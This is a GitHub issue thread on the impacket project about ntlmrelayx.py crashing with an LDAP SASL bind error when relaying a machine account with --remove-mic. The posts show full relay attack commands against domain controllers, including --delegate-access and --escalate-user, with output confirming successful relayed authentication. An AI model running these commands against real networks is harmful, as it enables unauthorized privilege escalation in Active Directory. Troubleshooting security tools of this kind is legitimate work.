### ISSUE TITLE
Fail to parse user with --remove-mic

### ISSUE THREAD

**Issue by S3cur3Th1sSh1t** [SecureAuthCorp/impacket#686]
When relaying a DC01$ Hash to a seccond DC over ldap or ldaps with option --remove-mic i got the following error:

```
ntlmrelayx.py -t ldap://x.x.x.x --remove-mic
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Received connection from x.x.x.x, attacking target ldap://x.x.x.x
[*] Authenticating against ldap://x.x.x.x as DOMAIN\DC02$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
Exception in thread Thread-4:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/root/.local/share/virtualenvs/cme-CHct9Ewc/local/lib/python2.7/site-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 500, in run
    userSid, privs = self.validatePrivileges(self.username, domainDumper)
  File "/root/.local/share/virtualenvs/cme-CHct9Ewc/local/lib/python2.7/site-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 331, in validatePrivileges
    self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
  File "/root/.local/share/virtualenvs/cme-CHct9Ewc/local/lib/python2.7/site-packages/ldap3/core/connection.py", line 782, in search
    response = self.post_send_search(self.send('searchRequest', request, controls))
  File "/root/.local/share/virtualenvs/cme-CHct9Ewc/local/lib/python2.7/site-packages/ldap3/strategy/base.py", line 289, in send
    raise LDAPSASLBindInProgressError(self.connection.last_error)
LDAPSASLBindInProgressError: cannot send operation requests while SASL bind is in progress
```
Could not figure out what the cause is but it looks like the DCs attributes cannot be looked up?

**Comment by asolino** [comment]
Any idea about this one @dirkjanm ?

**Comment by mpgn** [comment]
Same error on my side

```
bonclay@kali:~/impacket$ sudo ntlmrelayx.py -t ldaps://192.168.255.131 --delegate-access -debug --remove-mic -smb2support
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, attacking target ldaps://192.168.255.131
[*] Authenticating against ldaps://192.168.255.131 as GOLD/ZORO$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, but there are no more targets left!
[+] User is a member of: []
Exception in thread Thread-4:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 564, in run
    userSid, privs = self.validatePrivileges(self.username, domainDumper)
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 386, in validatePrivileges
    self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 782, in search
    response = self.post_send_search(self.send('searchRequest', request, controls))
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 289, in send
    raise LDAPSASLBindInProgressError(self.connection.last_error)
ldap3.core.exceptions.LDAPSASLBindInProgressError: cannot send operation requests while SASL bind is in progress
^Cbonclay@kali:~/impacket$ sudo ntlmrelayx.py -t ldap://192.168.255.131 --escalate-user ntu -debug --remove-mic -smb2support
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.8/dist-packages/impacket
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, attacking target ldap://192.168.255.131
[*] Authenticating against ldap://192.168.255.131 as GOLD/ZORO$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-3: Connection from GOLD/ZORO$@192.168.255.132 controlled, but there are no more targets left!
[+] User is a member of: []
Exception in thread Thread-4:
Traceback (most recent call last):
  File "/usr/lib/python3.8/threading.py", line 932, in _bootstrap_inner
    self.run()
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 564, in run
    userSid, privs = self.validatePrivileges(self.username, domainDumper)
  File "/usr/local/lib/python3.8/dist-packages/impacket/examples/ntlmrelayx/attacks/ldapattack.py", line 386, in validatePrivileges
    self.client.search(domainDumper.root, '(objectClass=domain)', attributes=['objectSid'])
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 782, in search
    response = self.post_send_search(self.send('searchRequest', request, controls))
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 289, in send
    raise LDAPSASLBindInProgressError(self.connection.last_error)
ldap3.core.exceptions.LDAPSASLBindInProgressError: cannot send operation requests while SASL bind is in progress
^Cbonclay@kali:~/impacket$ 
```

**Comment by mpgn** [comment]
This problem apprend when an computer account is used, everything works fine with a user account
